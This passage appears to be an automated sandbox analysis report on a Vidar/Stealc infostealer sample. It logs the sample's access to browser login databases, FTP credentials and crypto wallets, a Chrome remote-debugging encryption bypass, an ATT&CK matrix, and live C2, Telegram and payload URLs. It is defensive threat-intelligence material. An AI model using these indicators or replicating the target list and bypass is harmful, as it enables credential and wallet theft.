                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Attempt to bypass Chrome Application-Bound Encryption
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Yara detected Stealc
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.91ecc0.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CB60C40 sqlite3_bind_zeroblob,3_2_6CB60C40
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CB60D60 sqlite3_bind_parameter_name,3_2_6CB60D60
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CA88EA0 sqlite3_clear_bindings,3_2_6CA88EA0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          Create Account                          		1
                          Extra Window Memory Injection                          		3
                          Obfuscated Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		1
                          Registry Run Keys / Startup Folder                          		511
                          Process Injection                          		1
                          DLL Side-Loading                          		Security Account Manager3
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		1
                          Remote Access Software                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                          Registry Run Keys / Startup Folder                          		1
                          Extra Window Memory Injection                          		NTDS54
                          System Information Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Masquerading                          		LSA Secrets1
                          Query Registry                          		SSHKeylogging14
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
                          Process Injection                          		Cached Domain Credentials151
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560256 Sample: S0FTWARE.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 46 mvce45.cyou 2->46 48 t.me 2->48 50 2 other IPs or domains 2->50 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 11 other signatures 2->82 9 S0FTWARE.exe 2->9         started        12 msedge.exe 111 394 2->12         started        signatures3 process4 signatures5 84 Writes to foreign memory regions 9->84 86 Allocates memory in foreign processes 9->86 88 Injects a PE file into a foreign processes 9->88 14 BitLockerToGo.exe 145 9->14         started        19 msedge.exe 12->19         started        21 msedge.exe 12->21         started        23 msedge.exe 12->23         started        process6 dnsIp7 56 mvce45.cyou 49.13.32.95, 443, 49712, 49713 HETZNER-ASDE Germany 14->56 58 t.me 149.154.167.99, 443, 49711 TELEGRAMRU United Kingdom 14->58 60 127.0.0.1 unknown unknown 14->60 36 C:\ProgramData\vcruntime140.dll, PE32 14->36 dropped 38 C:\ProgramData\softokn3.dll, PE32 14->38 dropped 40 C:\ProgramData\nss3.dll, PE32 14->40 dropped 42 3 other files (none is malicious) 14->42 dropped 68 Attempt to bypass Chrome Application-Bound Encryption 14->68 70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->70 72 Found many strings related to Crypto-Wallets (likely being stolen) 14->72 74 7 other signatures 14->74 25 msedge.exe 2 11 14->25         started        28 chrome.exe 8 14->28         started        62 sb.scorecardresearch.com 18.165.220.106, 443, 49793 MIT-GATEWAYSUS United States 19->62 64 13.107.246.40, 443, 49820, 49821 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->64 66 20 other IPs or domains 19->66 file8 signatures9 process10 dnsIp11 90 Monitors registry run keys for changes 25->90 31 msedge.exe 25->31         started        52 192.168.2.8, 138, 443, 49226 unknown unknown 28->52 54 239.255.255.250 unknown Reserved 28->54 33 chrome.exe 28->33         started        signatures12 process13 dnsIp14 44 www.google.com 172.217.21.36, 443, 49723, 49727 GOOGLEUS United States 33->44

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          S0FTWARE.exe58%ReversingLabsWin32.Spyware.Vidar
                          S0FTWARE.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://mvce45.cyoua4a7f1267effnt-Disposition:0%Avira URL Cloudsafe
                          https://mvce45.cyou/vcruntime140.dll100%Avira URL Cloudmalware
                          https://mvce45.cyouXEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8K0%Avira URL Cloudsafe
                          https://mvce45.cyou/100%Avira URL Cloudmalware
                          https://mvce45.cyou/sT$100%Avira URL Cloudmalware
                          http://madskills.com/public/xml/rss/module/trackback/reflect.Value.Slice:0%Avira URL Cloudsafe
                          http://postneo.com/icbm/idna:0%Avira URL Cloudsafe
                          https://mvce45.cyou/lE100%Avira URL Cloudmalware
                          https://mvce45.cyou/CDu100%Avira URL Cloudmalware
                          https://mvce45.cyou/Ma100%Avira URL Cloudmalware
                          https://mvce45.cyou/s100%Avira URL Cloudmalware
                          https://mvce45.cyou/000100%Avira URL Cloudmalware
                          https://mvce45.cyou/b100%Avira URL Cloudmalware

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          chrome.cloudflare-dns.com
                          		162.159.61.3
                          		truefalse
                            		high
                            t.me
                            		149.154.167.99
                            		truefalse
                              		high
                              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                              		94.245.104.56
                              		truefalse
                                		high
                                sb.scorecardresearch.com
                                		18.165.220.106
                                		truefalse
                                  		high
                                  www.google.com
                                  		172.217.21.36
                                  		truefalse
                                    		high
                                    s-part-0035.t-0009.t-msedge.net
                                    		13.107.246.63
                                    		truefalse
                                      		high
                                      mvce45.cyou
                                      		49.13.32.95
                                      		truetrue
                                        		unknown
                                        sni1gl.wpc.nucdn.net
                                        		152.199.21.175
                                        		truefalse
                                          		high
                                          bzib.nelreports.net
                                          		unknown
                                          		unknownfalse
                                            		high
                                            assets.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              c.msn.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                ntp.msn.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  api.msn.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://mvce45.cyou/vcruntime140.dlltrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://t.me/fu4chmofalse
                                                      		high
                                                      https://mvce45.cyou/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://steamcommunity.com/profiles/76561199802540894false
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drfalse
                                                          		high
                                                          https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000003.00000003.2376930526.0000000003252000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003346000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2180204344.0000000003252000.00000004.00000020.00020000.00000000.sdmp, FBFCAK.3.dr, KFIJEG.3.dr, Web Data.13.drfalse
                                                              		high
                                                              https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 0000000B.00000003.2235364209.00006FE80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235199343.00006FE800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235494950.00006FE800270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/document/Jchrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ntp.msn.com/_defaultQuotaManager.13.drfalse
                                                                    		high
                                                                    http://anglebug.com/4633chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://anglebug.com/7382chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://issuetracker.google.com/284462263msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://mvce45.cyouXEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KBitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://google-ohttp-relay-join.fastly-edge.com/Achrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://polymer.github.io/AUTHORS.txtchrome.exe, 00000007.00000003.2115027855.00002FC000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115064466.00002FC000790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113134041.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113553954.00002FC000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115154105.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113523999.00002FC00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113644932.00002FC001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115191569.00002FC000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2113484219.00002FC00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://docs.google.com/chrome.exe, 00000007.00000003.2104728437.00002FC0004A8000.00000004.00000800.00020000.00000000.sdmp, manifest.json.13.drfalse
                                                                                  		high
                                                                                  https://docs.google.com/document/:chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://google-ohttp-relay-join.fastly-edge.com/Jchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://anglebug.com/7714chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.instagram.com5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                            		high
                                                                                            https://google-ohttp-relay-join.fastly-edge.com/Hchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://mvce45.cyou/lEBitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Mchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://t.me/fu4chmor08etMozilla/5.0S0FTWARE.exe, 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/Qchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/Wchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Vchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/6248chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                		high
                                                                                                                https://outlook.office.com/mail/compose?isExtension=true5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/6929chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/cchrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/5281chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://mvce45.cyoua4a7f1267effnt-Disposition:BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpfalse
